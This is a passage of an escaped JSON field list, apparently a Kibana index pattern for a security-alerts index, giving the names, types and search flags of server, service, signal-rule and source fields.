e\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"server.as.organization.name\"}}},{\"count\":0,\"name\":\"server.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"server.user.full_name\"}}},{\"count\":0,\"name\":\"server.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"server.user.name\"}}},{\"count\":0,\"name\":\"service.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.node.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.state\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.depth\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.rule\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.depth\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.group.index\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.action\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.dataset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.duration\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.end\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.kind\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.module\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"signal.original_event.outcome\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.risk_score_norm\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.sequence\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.severity\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.timezone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_time\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.depth\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.rule\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.depth\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.rule\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.author\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.building_block_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.created_at\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.created_by\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.enabled\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.false_positives\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.from\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.immutable\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.interval\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.language\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.license\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.max_signals\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.note\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"signal.rule.output_index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.query\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.references\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score_mapping.field\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score_mapping.operator\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score_mapping.value\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.rule_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.rule_name_override\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.saved_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.field\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.operator\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.severity\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.value\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.size\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.tags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.framework\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.tactic.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.tactic.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.tactic.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.technique.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.technique.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.technique.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threshold.field\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threshold.value\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.timeline_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.timeline_title\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.timestamp_override\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.to\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.updated_at\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.updated_by\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.threshold_count\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"source.as.organization.name\"}}},{\"count\":0,\"name\":\"source.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"source.user.full_name\"}}